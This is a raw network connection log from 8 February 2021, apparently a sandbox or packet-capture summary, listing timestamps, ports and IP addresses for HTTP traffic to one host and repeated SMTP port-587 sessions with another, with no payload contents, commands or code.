Feb 8, 2021 10:28:36.733660936 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.733870029 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.928457975 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.928486109 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.928524971 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.928554058 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.928608894 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.928634882 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.928637028 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.938230038 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.938256025 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.938286066 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.938316107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:36.938347101 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.938386917 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:36.938390970 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.133274078 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.133301020 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.133332014 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.133352995 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.133733988 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.142935991 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.142971992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.143006086 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.143037081 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.143188000 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.143210888 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.337977886 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.338037014 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.338088036 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.338135958 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.338140011 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.338174105 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.338181973 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.338187933 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.347590923 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.347650051 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.347681046 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.347757101 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.347883940 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.347915888 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.542758942 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.542788029 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.542820930 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.542843103 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.543066025 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.543112040 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.552088022 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.552114010 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.552248001 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.552270889 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.552272081 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.552308083 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.552336931 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.749583006 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.749663115 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.749686956 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:37.749840021 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:37.749878883 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:38.141226053 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:29:15.900645018 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.089776039 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.089931011 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.280077934 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.280643940 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.469201088 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.469336987 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.470200062 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.659040928 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.694916964 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.883744001 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.885086060 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.885160923 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.885210037 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.885238886 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.885255098 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:16.885699034 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.897903919 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:16.919994116 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:17.086601019 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:17.087234974 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:17.087488890 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:17.108562946 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:17.109117031 CET	587	49168	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:17.109240055 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:17.109311104 CET	49168	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.036336899 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.225682974 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.225764990 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.416186094 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.416733027 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.605216980 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.605782032 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.606370926 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.795337915 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.796415091 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.984935045 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.986512899 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.986555099 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.986603022 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.986646891 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:22.986717939 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.988284111 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:22.999993086 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:23.188482046 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:23.189307928 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:23.407253981 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:24.429364920 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:24.618021965 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:24.618415117 CET	587	49169	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:24.618549109 CET	49169	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:29.971906900 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:30.160267115 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:30.160504103 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:30.349409103 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:30.350186110 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:30.538081884 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:30.538182974 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:30.538736105 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:30.726928949 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:30.727866888 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:30.915985107 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:30.916007996 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:30.918401957 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:30.997445107 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:31.106220007 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.106245995 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.186569929 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.186959028 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.188601971 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:31.378431082 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.379803896 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.381105900 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:31.570827961 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.573141098 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.574426889 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:31.762399912 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.765002012 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.766050100 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:31.954005003 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.978550911 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:31.979069948 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.168085098 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.168572903 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.172671080 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.173115015 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.173249960 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.173937082 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.179193974 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.361473083 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.361517906 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.361726999 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.367033958 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.367187023 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.549474001 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.549501896 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.549781084 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.555084944 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.555366039 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.737525940 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.737557888 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.737576008 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.737597942 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.737766027 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.743077040 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.743114948 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.743139982 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.743261099 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.928124905 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.928303003 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.928438902 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.928522110 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.933593988 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.933643103 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.933770895 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:32.934134960 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:32.934511900 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:33.116112947 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.116152048 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.116245985 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.116270065 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.116357088 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.116566896 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.116780043 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:33.116817951 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.121423006 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.121536970 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.121562958 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.121584892 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.121875048 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:33.121963024 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:33.122133017 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.122190952 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.122215986 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.122329950 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.304404974 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.309621096 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.309660912 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.316718102 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:33.517018080 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:38.962776899 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:39.151926994 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.152270079 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.152295113 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.152384996 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:39.153081894 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:39.254189014 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:39.340689898 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.444952965 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.445127964 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:39.634231091 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.634582043 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:39.822372913 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.822638035 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:39.823504925 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:40.011332035 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.012304068 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:40.200103998 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.200628996 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.206151009 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:40.255705118 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:40.393945932 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.393995047 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.443509102 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.443778992 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.444726944 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:40.633044958 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.634296894 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.635896921 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:40.823822975 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.826499939 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:40.827410936 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.017774105 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.020536900 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.022460938 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.213924885 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.237807035 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.239654064 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.427398920 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.428159952 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.428989887 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.429008961 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.429172993 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.429342985 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.431998968 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.620464087 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.620516062 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.620611906 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.620666981 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.623014927 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.623313904 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.808412075 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.808464050 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.808681965 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.811137915 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.811299086 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.997153997 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.997199059 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.997433901 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.998980999 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.999037027 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:41.999105930 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:41.999155045 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.185286999 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.185333014 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.185359001 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.185461044 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.185568094 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.185612917 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.187055111 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.187156916 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.187171936 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.187218904 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.187755108 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.373416901 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373446941 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373455048 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373482943 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373495102 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373502016 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373509884 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373644114 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373656988 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373728037 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.373740911 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.374108076 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.374823093 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.374839067 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.375221014 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.375252962 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.375332117 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.375344038 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.375767946 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.375787973 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:42.561733961 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.565166950 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.573651075 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:42.784192085 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:49.160001993 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:49.347681999 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:49.348205090 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:49.348237038 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:49.348395109 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:49.349519014 CET	49172	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:49.445662022 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:49.537115097 CET	587	49172	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:49.636307955 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:49.636428118 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:49.827069044 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:49.827635050 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:50.016150951 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.016246080 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.016700029 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:50.206713915 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.207703114 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:50.396691084 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.396796942 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.399539948 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:50.408282042 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:50.587984085 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.588020086 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.596612930 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.597529888 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.598376036 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:50.786859035 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.787924051 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.788548946 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:50.976921082 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.979660988 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:50.980225086 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.169883013 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.171977043 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.172596931 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.360846996 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.382618904 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.383081913 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.571739912 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.572128057 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.573002100 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.573188066 CET	49173	587	192.168.2.22	198.54.122.60
